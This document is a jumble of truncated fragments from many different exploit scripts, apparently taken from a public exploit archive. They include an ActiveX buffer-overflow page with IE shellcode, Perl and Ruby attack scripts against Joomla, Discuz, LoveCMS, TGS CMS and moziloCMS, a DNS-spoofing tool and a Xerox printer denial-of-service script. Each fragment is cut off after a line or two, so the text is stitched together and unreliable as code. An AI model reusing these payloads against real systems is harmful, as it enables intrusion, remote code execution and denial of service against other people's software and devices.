var body='OBJECT CLASSID=CLSID:C932BA85-4374-101B-A56C-00AA003668DC width=10PARAM NAME=Mask VALUE='; var body1='/OBJECT'; var buf=''; for (i=1;i=1945;i++){buf=buf+unescape(%0C);} document.write(body+buf+body1);
/** ** ** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit. ** ** Based on exploit by Koshi (written in Perl). This one should be more ** stable. Just for fun and to learn more about win32 exploitation. ** ** by Wojciech Pawliko
html body object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target / /object script language=javascript // k`sOSe 08/08/2008 // tested in IE6, XP SP1 var shellcode = unescape(%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u01
#!/usr/bin/perl # # Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC) # # Summary: BlazeDVD is leading powerful and easy-to-use DVD player software. # It can provide superior video and audio(Dolby) quality, together with othe
html body object classid='clsid:82351441-9094-11D1-A24B-00A0C932C7DF' id='target' / /object script language=javascript // anigif.ocx by www.jcomsoft.com can be found distribuited with some applications, // I found it in Download Accelerator Plus 6.8.
?php error_reporting(E_ALLE_NOTICE); print_r( +------------------------------------------------------------------+ Exploit discuz6.0.1 Just work as php=5 mysql=4.1 BY james +------------------------------------------------------------------+ ); if($a
#!/usr/bin/ruby # ## Exploit by PoMdaPiMp! ## --------------------- ## pomdapimp(at)gmail(dotcom) ## ## LoveCMS Exploit Series ## Episode 1: adding a side block ## ## Description: add some php into a block container ## on the side of the site. phpinf
#!/usr/bin/perl #Note:Sometimes you have to change the regexp to viewcategory/catid,.$cid. use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print n; print ################################################################n; print # Joomla Compon
#TGS CMS Remote Code Execution Exploit #by 0in #from Dark-Coders Group! # www.dark-coders.pl # Contact: 0in(dot)email[at]gmail(dot)com # Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke # Dork:NULL - because You cannot kill what you did not c
/* h0dns_spoof.c - zmda - saik0pod@yahoo.com * - spoof dns on ircd's using the h0dns code * * - spoof dns on anything using the adns (asynchronous dns resolver) code * * - The bug: * - Static source port used by the adns code * - Sequential DNS ids i
#!/usr/bin/perl # carved-out by: crit3rion, just making th3 world a b3tt3r plac3! # Xerox_Remote_DoS.20080801.ver01 (tanx to dr0pz0N3 for reminding me to close my #$**! s0ck3t) # Make: Xerox # Model: Phaser 8400 # Firmware: 03/03/2004 # # What's the
/* * IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Expoit * * Discovered Written by r0ut3r (writ3r [at] gmail.com) * Many Thanks to Luigi Auriemma (http://aluigi.org) * * Greets to shinnai (http://www.shinnai.net) * and Guido Landi * * IntelliTa
#!/usr/bin/perl # # moziloCMS 1.10.1 Perl exploit # # discovered written by Ams # ax330d [doggy] gmail [dot] com # # DESCRIPTION: # Vulnerability hides in download.php, which we can use to download any file we want to. # Here, for example, admin/conf